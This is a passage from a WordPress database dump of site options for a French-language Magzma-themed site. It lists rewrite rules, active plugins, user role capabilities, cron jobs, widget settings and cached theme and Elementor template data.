([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:58:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:68:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:88:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:83:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:83:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:64:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:53:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/embed/?$\";s:91:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/trackback/?$\";s:85:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&tb=1\";s:77:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:72:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:65:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/page/?([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&paged=$matches[5]\";s:72:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/comment-page-([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&cpage=$matches[5]\";s:61:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)(?:/([0-9]+))?/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&page=$matches[5]\";s:47:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:57:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:77:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:72:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:72:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:53:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&cpage=$matches[4]\";s:51:\"([0-9]{4})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&cpage=$matches[3]\";s:38:\"([0-9]{4})/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&cpage=$matches[2]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";}','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(33,'active_plugins','a:11:{i:0;s:35:\"redux-framework/redux-framework.php\";i:1;s:19:\"akismet/akismet.php\";i:2;s:36:\"contact-form-7/wp-contact-form-7.php\";i:3;s:25:\"duplicator/duplicator.php\";i:4;s:53:\"easy-twitter-feed-widget/easy-twitter-feed-widget.php\";i:5;s:23:\"elementor/elementor.php\";i:6;s:53:\"facebook-like-box-widget/facebook-like-box-widget.php\";i:7;s:50:\"google-analytics-for-wordpress/googleanalytics.php\";i:8;s:26:\"popup-by-supsystic/pps.php\";i:9;s:27:\"trackserver/trackserver.php\";i:10;s:24:\"wordpress-seo/wp-seo.php\";}','yes'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','0','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','a:3:{i:0;s:121:\"/home/fmbangoura7/guineeinnove.nimbasolution.com/wp-content/plugins/facebook-like-box-widget/facebook-like-box-widget.php\";i:1;s:121:\"/home/fmbangoura7/guineeinnove.nimbasolution.com/wp-content/plugins/facebook-like-box-pop-up/facebook-like-box-pop-up.php\";i:2;s:0:\"\";}','no'),(40,'template','magzma','yes'),(41,'stylesheet','magzma','yes'),(42,'comment_whitelist','1','yes'),(43,'blacklist_keys','','no'),(44,'comment_registration','0','yes'),(45,'html_type','text/html','yes'),(46,'use_trackback','0','yes'),(47,'default_role','subscriber','yes'),(48,'db_version','38590','yes'),(49,'uploads_use_yearmonth_folders','1','yes'),(50,'upload_path','','yes'),(51,'blog_public','1','yes'),(52,'default_link_category','2','yes'),(53,'show_on_front','page','yes'),(54,'tag_base','','yes'),(55,'show_avatars','1','yes'),(56,'avatar_rating','G','yes'),(57,'upload_url_path','','yes'),(58,'thumbnail_size_w','150','yes'),(59,'thumbnail_size_h','150','yes'),(60,'thumbnail_crop','1','yes'),(61,'medium_size_w','300','yes'),(62,'medium_size_h','300','yes'),(63,'avatar_default','mystery','yes'),(64,'large_size_w','1024','yes'),(65,'large_size_h','1024','yes'),(66,'image_default_link_type','none','yes'),(67,'image_default_size','','yes'),(68,'image_default_align','','yes'),(69,'close_comments_for_old_posts','0','yes'),(70,'close_comments_days_old','14','yes'),(71,'thread_comments','1','yes'),(72,'thread_comments_depth','5','yes'),(73,'page_comments','0','yes'),(74,'comments_per_page','50','yes'),(75,'default_comments_page','newest','yes'),(76,'comment_order','asc','yes'),(77,'sticky_posts','a:0:{}','yes'),(78,'widget_categories','a:2:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(79,'widget_text','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(80,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(81,'uninstall_plugins','a:3:{s:50:\"google-analytics-for-wordpress/googleanalytics.php\";s:35:\"monsterinsights_lite_uninstall_hook\";s:45:\"custom-facebook-feed/custom-facebook-feed.php\";s:13:\"cff_uninstall\";s:26:\"popup-by-supsystic/pps.php\";a:2:{i:0;s:8:\"utilsPps\";i:1;s:12:\"deletePlugin\";}}','no'),(82,'timezone_string','','yes'),(83,'page_for_posts','0','yes'),(84,'page_on_front','360','yes'),(85,'default_post_format','0','yes'),(86,'link_manager_enabled','0','yes'),(87,'finished_splitting_shared_terms','1','yes'),(88,'site_icon','426','yes'),(89,'medium_large_size_w','768','yes'),(90,'medium_large_size_h','0','yes'),(91,'initial_db_version','38590','yes'),(92,'wpfy_user_roles','a:7:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:65:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:20:\"wpseo_manage_options\";b:1;s:15:\"use_trackserver\";b:1;s:19:\"trackserver_publish\";b:1;s:17:\"trackserver_admin\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:37:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:15:\"use_trackserver\";b:1;s:19:\"trackserver_publish\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:11:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:15:\"use_trackserver\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:13:\"wpseo_manager\";a:2:{s:4:\"name\";s:11:\"SEO Manager\";s:12:\"capabilities\";a:37:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;s:20:\"wpseo_manage_options\";b:1;}}s:12:\"wpseo_editor\";a:2:{s:4:\"name\";s:10:\"SEO Editor\";s:12:\"capabilities\";a:36:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;}}}','yes'),(93,'fresh_site','0','yes'),(94,'widget_search','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(95,'widget_recent-posts','a:3:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;i:4;a:0:{}}','yes'),(96,'widget_recent-comments','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(97,'widget_archives','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(98,'widget_meta','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(99,'sidebars_widgets','a:4:{s:19:\"wp_inactive_widgets\";a:2:{i:0;s:14:\"recent-posts-4\";i:1;s:19:\"social_box-widget-3\";}s:8:\"footer-1\";a:0:{}s:15:\"primary-sidebar\";a:2:{i:0;s:17:\"facebooklikebox-3\";i:1;s:9:\"do-etfw-3\";}s:13:\"array_version\";i:3;}','yes'),(100,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(101,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(102,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(103,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(104,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(105,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(106,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(107,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(108,'cron','a:8:{i:1512733789;a:1:{s:29:\"akismet_schedule_cron_recheck\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}i:1512740924;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1512740951;a:1:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1512745281;a:1:{s:24:\"akismet_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1512747264;a:1:{s:19:\"wpseo-reindex-links\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1512750442;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1512777660;a:1:{s:26:\"monsterinsights_daily_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}s:7:\"version\";i:2;}','yes'),(109,'theme_mods_twentyseventeen','a:2:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1508766602;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}}}}','yes'),(116,'WPLANG','fr_FR','yes'),(126,'can_compress_scripts','0','no'),(140,'_site_transient_timeout_wporg_theme_feature_list','1508777355','no'),(141,'_site_transient_wporg_theme_feature_list','a:3:{s:6:\"Layout\";a:7:{i:0;s:11:\"grid-layout\";i:1;s:10:\"one-column\";i:2;s:11:\"two-columns\";i:3;s:13:\"three-columns\";i:4;s:12:\"four-columns\";i:5;s:12:\"left-sidebar\";i:6;s:13:\"right-sidebar\";}s:8:\"Features\";a:20:{i:0;s:19:\"accessibility-ready\";i:1;s:10:\"buddypress\";i:2;s:17:\"custom-background\";i:3;s:13:\"custom-colors\";i:4;s:13:\"custom-header\";i:5;s:11:\"custom-menu\";i:6;s:12:\"editor-style\";i:7;s:21:\"featured-image-header\";i:8;s:15:\"featured-images\";i:9;s:15:\"flexible-header\";i:10;s:14:\"footer-widgets\";i:11;s:20:\"front-page-post-form\";i:12;s:19:\"full-width-template\";i:13;s:12:\"microformats\";i:14;s:12:\"post-formats\";i:15;s:20:\"rtl-language-support\";i:16;s:11:\"sticky-post\";i:17;s:13:\"theme-options\";i:18;s:17:\"threaded-comments\";i:19;s:17:\"translation-ready\";}s:7:\"Subject\";a:9:{i:0;s:4:\"blog\";i:1;s:10:\"e-commerce\";i:2;s:9:\"education\";i:3;s:13:\"entertainment\";i:4;s:14:\"food-and-drink\";i:5;s:7:\"holiday\";i:6;s:4:\"news\";i:7;s:11:\"photography\";i:8;s:9:\"portfolio\";}}','no'),(144,'current_theme','Magzma','yes'),(145,'theme_mods_magzma','a:12:{i:0;b:0;s:18:\"nav_menu_locations\";a:3:{s:8:\"top-menu\";i:12;s:11:\"header-menu\";i:13;s:11:\"footer-menu\";i:0;}s:18:\"custom_css_post_id\";i:429;s:11:\"custom_logo\";i:892;s:20:\"magzma_facebook_link\";s:43:\"https://www.facebook.com/guineeinnovations/\";s:19:\"magzma_twitter_link\";s:34:\"https://twitter.com/Gn_innovations\";s:18:\"magzma_google_link\";s:0:\"\";s:19:\"magzma_youtube_link\";s:0:\"\";s:21:\"magzma_instagram_link\";s:0:\"\";s:15:\"magzma_logo_top\";s:0:\"\";s:18:\"magzma_logo_bottom\";s:0:\"\";s:26:\"magzma_head_container_size\";s:4:\"1170\";}','yes'),(146,'theme_switched','','yes'),(147,'fs_active_plugins','O:8:\"stdClass\":2:{s:7:\"plugins\";a:1:{s:25:\"../themes/magzma/freemius\";O:8:\"stdClass\":4:{s:7:\"version\";s:5:\"1.2.2\";s:4:\"type\";s:5:\"theme\";s:9:\"timestamp\";i:1508766603;s:11:\"plugin_path\";s:6:\"magzma\";}}s:6:\"newest\";O:8:\"stdClass\":5:{s:11:\"plugin_path\";s:6:\"magzma\";s:8:\"sdk_path\";s:25:\"../themes/magzma/freemius\";s:7:\"version\";s:5:\"1.2.2\";s:13:\"in_activation\";b:0;s:9:\"timestamp\";i:1508766603;}}','yes'),(148,'fs_debug_mode','','yes'),(149,'fs_accounts','a:5:{s:21:\"id_slug_type_path_map\";a:1:{i:695;a:3:{s:4:\"slug\";s:6:\"magzma\";s:4:\"type\";s:5:\"theme\";s:4:\"path\";s:87:\"/home/fmbangoura7/guineeinnove.nimbasolution.com/wp-content/themes/magzma/functions.php\";}}s:10:\"theme_data\";a:1:{s:6:\"magzma\";a:16:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:87:\"/home/fmbangoura7/guineeinnove.nimbasolution.com/wp-content/themes/magzma/functions.php\";}s:17:\"install_timestamp\";i:1508766603;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:16:\"sdk_last_version\";N;s:11:\"sdk_version\";s:5:\"1.2.2\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";N;s:14:\"plugin_version\";s:3:\"1.1\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:30:\"guineeinnove.nimbasolution.com\";s:9:\"server_ip\";s:13:\"41.223.49.245\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1508766603;s:7:\"version\";s:3:\"1.1\";}s:15:\"prev_is_premium\";b:0;s:14:\"previous_theme\";s:15:\"twentyseventeen\";s:12:\"is_anonymous\";a:3:{s:2:\"is\";b:1;s:9:\"timestamp\";i:1508766614;s:7:\"version\";s:3:\"1.1\";}}}s:13:\"file_slug_map\";a:1:{s:6:\"magzma\";s:6:\"magzma\";}s:6:\"themes\";a:1:{s:6:\"magzma\";O:9:\"FS_Plugin\":16:{s:16:\"parent_plugin_id\";N;s:5:\"title\";s:6:\"Magzma\";s:4:\"slug\";s:6:\"magzma\";s:4:\"file\";s:6:\"magzma\";s:7:\"version\";s:3:\"1.1\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:0;s:7:\"is_live\";b:1;s:4:\"type\";s:5:\"theme\";s:10:\"public_key\";s:32:\"pk_c080c9ae0260782dc4190b35fd883\";s:10:\"secret_key\";N;s:2:\"id\";s:3:\"695\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:9:\"unique_id\";s:32:\"287319824d2096ea9eb0ce5c4cad2cd7\";}','yes'),(150,'widget_social_box-widget','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:0:{}}','yes'),(151,'fs_api_cache','a:0:{}','yes'),(157,'wpcf7','a:2:{s:7:\"version\";s:5:\"4.9.1\";s:13:\"bulk_validate\";a:4:{s:9:\"timestamp\";i:1508766637;s:7:\"version\";s:3:\"4.9\";s:11:\"count_valid\";i:1;s:13:\"count_invalid\";i:0;}}','yes'),(162,'_elementor_installed_time','1508766656','yes'),(163,'elementor_remote_info_templates_data','a:125:{i:0;a:12:{s:2:\"id\";s:4:\"2402\";s:5:\"title\";s:32:\"Homepage &#8211; Interior Design\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2017/09/Interior.png\";s:12:\"tmpl_created\";s:10:\"1506441447\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/homepage-interior-design/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"2\";s:16:\"popularity_index\";s:2:\"51\";s:11:\"trend_index\";s:2:\"26\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:1;a:12:{s:2:\"id\";s:3:\"147\";s:5:\"title\";s:16:\"Homepage – 